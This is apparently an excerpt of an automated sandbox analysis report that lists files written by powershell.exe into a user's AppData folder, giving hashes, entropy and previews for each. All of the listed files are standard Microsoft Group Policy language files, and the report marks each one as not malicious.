Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="RestrictWelcomeCenter">Do not display the Welcome Center at user logon</string>.. <string id="RestrictWelcomeCenter_Help">This policy setting prevents the display of the Welcome Center at user logon.....If you enable this policy setting, the Welcome Center is not displayed at user logon. The user can access the Welcome Center using the Control Panel or Start menu.....If you disable or do not configure this policy setting, the Welcome Center is displayed at user logon.</string>.. </stringTable>.. </resource

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Sidebar.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2181
Entropy (8bit):	4.808024425882859
Encrypted:	false
SSDEEP:	48:cgeD5x8gm8fKv7uPPd4IaFpT6P0vQWjp3lFV:LeD5pm38BG56i1FV
MD5:	FF097ECD6B6D14BEEB70B111DEB1EE8C
SHA1:	2AE1D93696A7892254D05D9C73B21360B056EDAE
SHA-256:	70198BCD06B06CBBFBE1CCDDDC0815D3BB2239CAD51403E32340C20B892A06D9
SHA-512:	E1C41A1B9CC3CE9987CFA52447A24CCEA55CE38F4F09AAC5071365CF206D28D94F7C4CE77B3B693D019084DA2BD5F9646EEB287BA8C4CBDADB06C6614EF87F03
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Sidebar">Desktop Gadgets</string>.. <string id="TurnOffSidebar">Turn off desktop gadgets</string>.. <string id="TurnOffSidebar_Explain">This policy setting allows you to turn off desktop gadgets. Gadgets are small applets that display information or utilities on the desktop.....If you enable this setting, desktop gadgets will be turned off.....If you disable or do not configure this setting, desktop gadgets will be turned on.....The default is for desktop gadgets to be turned on.</string>.. <string

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\SkyDrive.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with very long lines (698), with CRLF line terminators
Category:	dropped
Size (bytes):	3086
Entropy (8bit):	4.858829936806005
Encrypted:	false
SSDEEP:	48:c/x8gZmwKweH8weDCmOw7khgLf6aweXLwepnFo7hgjfAwleJ9dwBb7DQweFXKV:wpZmmymCmCeSVAo7hzzM7DXLV
MD5:	7C6ABEF96D8FC4473B348F9CC6AB14CA
SHA1:	4ED99551F1EF8DCD42BC5A66A9072739CBB106A8
SHA-256:	0D9F815210F123D3A3201EA0530F0C5F4C8C2B3CF6AE146402D1B3D7E83E77C6
SHA-512:	A360D6F086C9173869E70027EEB9BA07CE40DEA1098E0582206F7A4D3EF101DDD4DDBCB5A7CB95445CC4394FB09577D6C81DACEC6791F592DE18F80A515C75C8
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://www.microsoft.com/GroupPolicy/PolicyDefinitions">.. <displayName>Prevent OneDrive file sync</displayName>.. <description>Prevent files from being automatically synced to OneDrive</description>.. <resources>.. <stringTable>.. general -->.. <string id="SkydriveSettingCategory">OneDrive</string>.. .. prevent file sync-->.. <string id="PreventSkydriveFileSync">Prevent the usage of OneDrive for file storage</string>.. <string id="PreventSkydriveFileSync_help">This policy setting lets you prevent apps and features from working with files on OneDrive...If you enable this policy setting:....* Users can.t access OneDrive from the OneDrive app and file picker...* Windows Store apps can.t access OneDrive using the WinRT API...* OneDrive

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Smartcard.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (505), with CRLF line terminators
Category:	dropped
Size (bytes):	13897
Entropy (8bit):	4.622403059025047
Encrypted:	false
SSDEEP:	192:ErlLxCEj//4LPwqCop5PqByD2mqKzeYWApNHXsV3sCkm0gb9DiCPoQCDEi1969sp:OHal3as861969sMot
MD5:	8EE4A00ED150375834D94CDF3644BB08
SHA1:	2818877ACB6381F12CB1583B8C366B8E2E8FB8CF
SHA-256:	CF6F61B50CD4BF427834FEC9D7D5C6FBDC0CDB3C5E8E07A66F04BA3D60E093B9
SHA-512:	4E4B668272BF4F64C4C47E09A2F38422D49391C418A62CB1E955A683B7045E0646FDC33E5565902F20281D28406074FFC07FC9A5AB9A4154B6F2D496C3DD1087
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowCertificatesWithNoEKU">Allow certificates with no extended key usage certificate attribute</string>.. <string id="AllowCertificatesWithNoEKU_help">This policy setting lets you allow certificates without an Extended Key Usage (EKU) set to be used for logon.....In versions of Windows prior to Windows Vista, smart card certificates that are used for logon require an enhanced key usage (EKU) extension with a smart card logon object identifier. This policy setting can be used to modify that restriction.....If

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Snis.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2612
Entropy (8bit):	4.846146849523547
Encrypted:	false
SSDEEP:	48:cgeD5x8gm8fKmZRbhuTOk1/hK82bGGrTFwbXOxJhK8hTwJkxwXzNCSFV:LeD5pmCZlhuykphr2bGGrTFwb+7hrhT8
MD5:	80C54C63C7D081F9C7D7738D50F1D92A
SHA1:	11ECD72C962D4B9F90E158A8D0D9544A3101D6A0
SHA-256:	D764EA69BA0C9BF3B83D8D497820419A8EC755B4A81C4394DB5A73C6FF19CDFB
SHA-512:	D82E63819C06EBAE7A2E0BD8B9CD879D766EA18A4B2B2CAB3E38A2ECF8D585E40C0F2EF89FD59781B3D6A6152AC65C40A2FEC966BB37151F8DA3CFEA8AD4ED22
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Snis">Server for NIS</string>.. <string id="Snis_LoggingLevel">Turn on extensive logging for Active Directory Domain Services domain controllers that are running Server for NIS</string>.. <string id="Snis_LoggingLevel_Help">This policy setting allows an administrator to configure extensive logging for computers that are running Server for Network Information Service (NIS).....If you enable this policy setting, intermediate steps of NIS map updates or propagations, and whether map updates are successful, a

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Snmp.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5042
Entropy (8bit):	4.799259798850357
Encrypted:	false
SSDEEP:	96:LeD5pm4bGHevi6cwIJyoKbT6c0Jyovt46cwnJyoPlV:EJHi65MKf6JF4655PH
MD5:	C5F44A83C74633615BB7005A8530B912
SHA1:	63AFE83576A32B083EFA4003A95CD82A66461FDC
SHA-256:	205A6CCFF312FB39D59B754925B871CA51845DEB5224EC0BF41B48BE64589C7D
SHA-512:	A11028E185B061A2F42849F09CBB50AA75D0B6FB25650A65C1099CC33E5CEFD024B870F0E3E5C39C1B632DCDC9B4AB7526D5A29DD5DF1E33BABB45AA31D6F4AC
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="SNMP_Communities">Specify communities</string>.. <string id="SNMP_PermittedManagers">Specify permitted managers</string>.. <string id="SNMP_PermittedManagers_Help">This policy setting determines the permitted list of hosts that can submit a query to the Simple Network Management (SNMP) agent running on the client computer.....Simple Network Management Protocol is a protocol designed to give a user the capability to remotely manage a computer network by polling and setting terminal values and monitoring ne

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\SoundRec.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1152
Entropy (8bit):	4.968946981075251
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61yef8kxNxVhSexuCvLeKF47q8wFV:cgeD5x8gm8fKR8kNxVPcCzeo4XwFV
MD5:	9C112ED54F6D15614FBA9B6AA1CDFBB0
SHA1:	1F3FFFEA352DC383AA91DFC61290B95218910B59
SHA-256:	F44E48D84C8A5914AAEBC31206F09194DC1041F3DEA70AD7ECD0E402EE3DF165
SHA-512:	E60C57BC46963AC5A09F9C7EA82A23A5E06155D4FF0417EE5A0672B7CB053F62D8765FF807FCE58F2EBF15AB835C942B45089DE2A12B5ED3B5CA7C63D62A8941
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Soundrec_DiableApplication_TitleText">Do not allow Sound Recorder to run</string>.. <string id="Soundrec_DisableApplication_DescriptionText">Specifies whether Sound Recorder can run.....Sound Recorder is a feature of Microsoft Windows Vista that can be used to record sound from an audio input device where the recorded sound is encoded and saved as an audio file.....If you enable this policy setting, Sound Recorder will not run.....If you disable or do not configure this policy setting, Sound Recorder can be ru

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\StartMenu.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with very long lines (491), with CRLF line terminators
Category:	dropped
Size (bytes):	54118
Entropy (8bit):	4.666836415862256
Encrypted:	false
SSDEEP:	768:kpbzNqeMWd095QOJzSqREFzK1HF/KPCyFqcJjkOme8j:kp/xMWd095QKz9oPCyUh
MD5:	41F89434F7FD242C4772AFB8152909BD
SHA1:	BCC3FC1A4CAE549D934AC9C18C61E4C956E275B7
SHA-256:	030E413AF912FFCBFDB98B2E96A898B6826F7653C1ED021F4CEEDCC7B8C2127E
SHA-512:	27C9BFBF15C3B7BF41A4030094F7B588ED531C2EFB4517E5F9F51A82F55E87BB6C58A9C020C9CF35BFFFD953EE91B39115A4D766C29873ADBE95B448E551EF6E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ClearRecentProgForNewUserInStartMenu">Clear the recent programs list for new users</string>.. <string id="ClearRecentProgForNewUserInStartMenu_Help">If you enable this policy setting, the recent programs list in the start menu will be blank for each new user.....If you disable or do not configure this policy, the start menu recent programs list will be pre-populated with programs for each new user.</string>.. <string id="NoGamesFolderOnStartMenu">Remove Games link from Start Menu</string>.. <string i

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\SystemRestore.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2647
Entropy (8bit):	4.731629807407312
Encrypted:	false
SSDEEP:	48:cgeD5x8gm8fKJzpQytkh9hyLbSTW3bvkKh+HAskRcHGhwHSbzURJ1amFV:LeD5pm1J+cbeKhjREVbFFV
MD5:	F0306B958EC9DAF0C4E5D2BA8355A02E
SHA1:	970411B4074BB88CDC75E6CA63D83B51FD6220E3
SHA-256:	79B2C3CA033B5CCECB7D24032FFBF7A718EC34BAF4C8BA66E862917337B9FBB5
SHA-512:	32777DE33CE98BE7333D9045D8E1033E629160AD7CC205B6CCA1523F2E6886CBEE20F3682D59D315B949B35481711E8B8A6EA7399BD0137A83496D800BC6882E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="SR">System Restore</string>.. <string id="SR_DisableConfig">Turn off Configuration</string>.. <string id="SR_DisableConfig_Help">Allows you to disable System Restore configuration through System Protection.....This policy setting allows you to turn off System Restore configuration through System Protection.....System Restore enables users, in the event of a problem, to restore their computers to a previous state without losing personal data files. The behavior of this policy setting depends on the "Turn o

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\TPM.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with very long lines (751), with CRLF line terminators
Category:	dropped
Size (bytes):	19376
Entropy (8bit):	4.677466344688263
Encrypted:	false
SSDEEP:	384:qPHRyQKHBVDkb+wRZtGixXgixyeMJgKzX1SR7YK9q/:qPHgQyPIbBRZtGYXgYYGKUg
MD5:	62D34160550F61471F77F778AA1280CA
SHA1:	2D681645F48460DBA0875917CBF1D2EA0970A161
SHA-256:	62154D9046066523B2833A380FB4A6841AB369D4E7502D1EF8AD93462E0CCE12
SHA-512:	0ACBF5E61FFB9E1F18496F6713F865E392E92CE613CFC143DAF254F63101CB1B0C0FAF16931B111BF1E47E7206B4676079371BCCD6A25543EA6A18AD676B9590
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ActiveDirectoryBackup_Help">This policy setting allows you to manage the Active Directory Domain Services (AD DS) backup of Trusted Platform Module (TPM) owner information. ....TPM owner information includes a cryptographic hash of the TPM owner password. Certain TPM commands can only be run by the TPM owner. This hash authorizes the TPM to run these commands. ....If you enable this policy setting, TPM owner information will be automatically and silently backed up to AD DS when you use Windows to set or change a TP

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\TabletPCInputPanel.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with very long lines (416), with CRLF line terminators
Category:	dropped
Size (bytes):	14958
Entropy (8bit):	4.684169671948835
Encrypted:	false
SSDEEP:	192:ErZjCAOTCAClCIkwgLtL99S6hOmL0wD4mHAwq8Qh5Kxk4kxgxWx+FNPUX0E:XAZALIYLtL9ILa8blKxk4kxgxWxFkE
MD5:	0F06155D65FCA728F2D46F0A96F4801B
SHA1:	E8D67D09DF0AED3FC5AED0832D901F31830D8A8C
SHA-256:	C170A92E97B43769613F0217D452B39D28A856AD93E95C0CD2E9A40FCC04E6A0
SHA-512:	62DAF44885B775BB39F4E38F5188F0FD2096C78A0F5328451F239D78E4F9325224A8A0AAF769DDA8127CCD879F32F6A012B896E01AABAD8133D738B77B54528D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AutoComplete">Turn off AutoComplete integration with Input Panel</string>.. <string id="AutoCompleteExplain">Turns off the integration of application auto complete lists with Tablet PC Input Panel in applications where this behavior is available.....Tablet PC Input Panel is a Tablet PC accessory that enables you to use handwriting or an on-screen keyboard to enter text, symbols, numbers, or keyboard shortcuts.....If you enable this policy, application auto complete lists will never appear next to Input Panel.

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\TabletShell.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (546), with CRLF line terminators
Category:	dropped
Size (bytes):	6673
Entropy (8bit):	4.787936688249674
Encrypted:	false
SSDEEP:	96:LeD5pmXFnAAWTYvS60sTs2ssufgMA7I16D4K9OuNtFV:E6SCKi78DK9XNtn
MD5:	166E80C965CED6606C2DA93D9A03B421
SHA1:	A7651889CBFEF22000E75B348428689C0E755BF7
SHA-256:	88F472A0DA1243EA84662AE4D730D6B86EE53E1901D7CC73EEA724218BD9EBE4
SHA-512:	0CB95E31997AF6E77C155081FCA24FBDE9B401944251ED0D3C04F4A35F017BC3BBB4CFAEEEA8175D56C64CA9352F84DFC45827D76C0DB95CBE314F562C3C4CE0
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Accessories">Accessories</string>.. <string id="Cursors">Cursors</string>.. <string id="DisableInkball">Do not allow Inkball to run</string>.. <string id="DisableInkball_Help">Prevents start of InkBall game.....If you enable this policy, the InkBall game will not run.....If you disable this policy, the InkBall game will run.....If you do not configure this policy, the InkBall game will run.</string>.. <string id="DisableJournal">Do not allow Windows Journal to be run</string>.. <string id="

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\TaskScheduler.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (579), with CRLF line terminators
Category:	dropped
Size (bytes):	7038
Entropy (8bit):	4.643182607339355
Encrypted:	false
SSDEEP:	192:Ey3uDxqKgSDQ0DiMDoK5DuJW+ibACSYZCn:rWYaQ0Pnu4PjSZ
MD5:	09BB6BBD535E6B16043D7DE703670523
SHA1:	3E7743A2557844CCCC6E5AE42827E676577FE9F4
SHA-256:	00250A97BC62D5C01E534907317937337008B28110DD7AB88A5D32AA347A3B9E
SHA-512:	118B1B0C181AD2DD89955BFDB828E10381F481B81321295AF016A2536B86A26F302F20DFC542974CD512C48F9F2B080CE482D08031BB9B2033328267BF093DD9
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowBrowse">Prohibit Browse</string>.. <string id="AllowBrowseHelp">Limits newly scheduled to items on the user's Start menu, and prevents the user from changing the scheduled program for existing tasks.....This setting removes the Browse button from the Schedule Task Wizard and from the Task tab of the properties dialog box for a task. Also, users cannot edit the "Run" box or the "Start in" box that determine the program and path for a task.....As a result, when users create a task, they must select a progra

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Taskbar.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with very long lines (325), with CRLF line terminators
Category:	dropped
Size (bytes):	11395
Entropy (8bit):	4.633029483097701
Encrypted:	false
SSDEEP:	192:EytLqsKeNTdPL5M8R1QfkSK1GOROjzazDzLh5/Cbl4Zgx9IQCmJwgjRLEJn:zM8R1QiGwCCDhtS41
MD5:	B04329C131F6270E21143E3A48884E73
SHA1:	21A2CA3E301813810D7B3874D625C4FABC5DD96A
SHA-256:	17A7E0C29F6FAD55F06306ECE4251A6BF7D40BB30C3178385D01CFFC805A1164
SHA-512:	E50307FA3358D4CAC0C2CE8C5DFD568DDC0795E07DD38A5F655C6BF0F2F071B8D5479D6F89483959054B7256E0BCB09631F8E902B64F0F19CBB051030815633E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="HideSCABattery">Remove the battery meter</string>.. <string id="HideSCABattery_Help">This policy setting allows you to remove the battery meter from the system control area.....If you enable this policy setting, the battery meter is not displayed in the system notification area.....If you disable or do not configure this policy setting, the battery meter is displayed in the system notification area.</string>.. <string id="HideSCANetwork">Remove the networking icon</string>.. <string id="HideSCANetwor

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\TerminalServer-Server.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (495), with CRLF line terminators
Category:	dropped
Size (bytes):	19641
Entropy (8bit):	4.878122311324998
Encrypted:	false
SSDEEP:	384:HTFGnX5V42B4kc7w3p98BlDJQ2yhfOBV41eCFksM08wjblv:HTI5/b2KfSiNbh
MD5:	F835CA2B1226B25600345F974B8706C4
SHA1:	1B7BA254D3835BA025A8D68A8AC757019081AA09
SHA-256:	E827705FA042FDD68C493B5F0159FE68B10F6B310C957A7F23F45F20DB14666E
SHA-512:	183483215CAE2BA72A226AC50F6057D566A23E411C3BAABF0BBBBB6145046E85049F4B526CDA4591C145F6A92AB75567661885EDCECCE13B60EC0C00DD8E28FA
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="TS_APP_COMPATIBILITY">Application Compatibility</string>.. <string id="TS_APP_COMPATIBILITY_Help">Controls application compatibility settings on an RD Session Host server</string>.. <string id="TS_TIME_ZONE">Allow time zone redirection</string>.. <string id="TS_TIME_ZONE_EXPLAIN">This policy setting allows you to specify whether the client computer redirects its time zone settings to the Remote Desktop Services session.....If you enable this policy setting, clients that are capable of time zone redir

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\TerminalServer.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (638), with CRLF line terminators
Category:	dropped
Size (bytes):	127562
Entropy (8bit):	4.836430182678649
Encrypted:	false
SSDEEP:	1536:9h4lfgUCtmBM22pFN8z0u753oq+I/jIqGUZRGUCFUvyP+YA4RhVjn:9hrtHrzGDiI/jIqGYRGQi3Vjn
MD5:	3602B346F09097D79EAA8029915B67F9
SHA1:	4BB802511857288C2ADA07AD532CB19E7CD5CD9D
SHA-256:	FF74BE25815C0CA023FAD48EA35E6FA32566065485534D01842D617EB39F8ACE
SHA-512:	77DDACF30B5D72A159A726FE040218F25D8E902C58CAE6D100F8B01255415C461C55A3645F643FB52D63B8079F0FCE6107CB96358EBBC7141A380D445C4B195A
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="TS_SUPPORTED_Windows8_or_ARM">At least Windows 8 or Windows RT</string>.. <string id="TS_SUPPORTED_Windows8_Server">At least Windows Server 2012 R2</string>.. <string id="TS_SUPPORTED_Windows8_Enterprise_AND_Server"> At least Windows 8 Enterprise or Windows Server 2012 R2</string>.. <string id="TS_SUPPORTED_ONLY_Windows7_OR_SERVER2K8R2">Windows 7 or Windows Server 2008 R2 (and their subsequent Service Packs) only</string>.. <string id="TS_SUPPORTED_ONLY_LEGACY">Windows Server 2008 R2, Windows Se

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Thumbnails.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2359
Entropy (8bit):	4.864135463263543
Encrypted:	false
SSDEEP:	48:cgeD5x8gm8fKlmesQ6SmH6Se6dSGH6crboeoO6S86Ss6dS6H6cr3DJUlptRdpEFV:LeD5pm5mZymDm8rboB8OwAr3DJUlfv2n
MD5:	9DDDBE09EE87B401376670F58F52B8CB
SHA1:	3E3D3EFB918717C290B5E1FAAA19721160449A05
SHA-256:	36E567DB6F269F42865BC122835CBF10C7DE187AFF70BA93BA81C045486A134A
SHA-512:	10A5388C2C26BCAB4E38A9507A958BA2A33A09184F003632C51C9405376E43CE27E96C3F7812C51766DD71855ACD81F1ACF4B096EA263F44C2B9623663C04738
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableThumbnails">Turn off the display of thumbnails and only display icons.</string>.. <string id="DisableThumbnails_Help">This policy setting allows you to configure how File Explorer displays thumbnail images or icons on the local computer.....File Explorer displays thumbnail images by default. ....If you enable this policy setting, File Explorer displays only icons and never displays thumbnail images.....If you disable or do not configure this policy setting, File Explorer displays only thumbnail images.<

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\TouchInput.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2055
Entropy (8bit):	4.807218997990388
Encrypted:	false
SSDEEP:	48:cgeD5x8gm8fKKU6oYecyziGWMlHqf+encFV:LeD5pm9HAd+FV
MD5:	9562339E02D38BECE2D7D3C89EE47766
SHA1:	1512A1230E2585B62FB78E1EE9E147FBCCF91D8F
SHA-256:	A376991D45DD68CD83E2A76C75F136B75033FDE16297EC2868755268AF2869E2
SHA-512:	531900F6AAADECA8DEF9C70F2E2D9A1A930237EE3E74CB1CF1172A2637DB340382E5108BD138F701CB533643EEA2514C2C43A1CC373B7F1EEB2FF103BCBF4AD5
Malicious:	false
